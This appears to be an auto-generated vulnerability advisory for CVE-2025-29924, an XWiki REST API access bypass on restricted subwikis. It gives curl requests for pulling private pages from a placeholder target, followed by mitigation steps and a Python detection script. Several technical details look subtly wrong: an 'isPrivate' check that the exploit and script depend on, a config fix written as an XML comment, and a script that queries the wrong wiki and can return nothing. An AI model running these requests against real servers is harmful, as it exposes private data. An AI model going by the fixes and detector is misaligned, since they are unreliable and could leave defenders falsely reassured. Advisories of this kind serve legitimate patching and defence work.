How CVE-2025-29924 Works
This vulnerability exploits improper access control in XWiki’s REST API when subwikis enforce “Prevent unregistered users to view pages.” Attackers bypass authentication by directly querying restricted pages via the API, exposing private data. The flaw stems from missing validation checks in API endpoints, allowing unauthorized retrieval of content despite subwiki restrictions. Affected versions include XWiki <15.10.14, <16.4.6, and pre-16.10.0-rc-1.
DailyCVE Form
Platform: XWiki Platform
Version: <15.10.14
Vulnerability: Access Bypass
Severity: Critical
Date: 2025-03-19
What Undercode Say:
Exploitation
1. Detect Subwiki Config:
curl -X GET "http://target/subwiki/rest/wikis/xwiki/spaces" -H "Accept: application/json"
Check for `”isPrivate”: true` in response.
2. Bypass Access Control:
curl -X GET "http://target/subwiki/rest/wikis/xwiki/spaces/Main/pages/PrivatePage" -H "Accept: application/json"
Returns private page content if vulnerable.
Mitigation
1. Patch: Upgrade to XWiki 15.10.14/16.4.6/16.10.0RC1.
2. Temporary Fix: Disable REST API for subwikis:
<!-- xwiki.cfg --> xwiki.rest.enabled=false
3. Log Monitoring:
grep "GET /rest/wikis" /var/log/xwiki/access.log
Detection Script (Python)
import requests
def check_cve_2025_29924(url):
try:
r = requests.get(f"{url}/rest/wikis/xwiki/spaces", headers={"Accept": "application/json"})
if r.status_code == 200 and "isPrivate" in r.text:
r2 = requests.get(f"{url}/rest/wikis/xwiki/spaces/Main/pages/WebHome")
return r2.status_code == 200
except:
return False
Analytics
- CVSS: 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
- Exploitability: Remote, no auth required.
- Impact: Confidentiality breach.
References
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
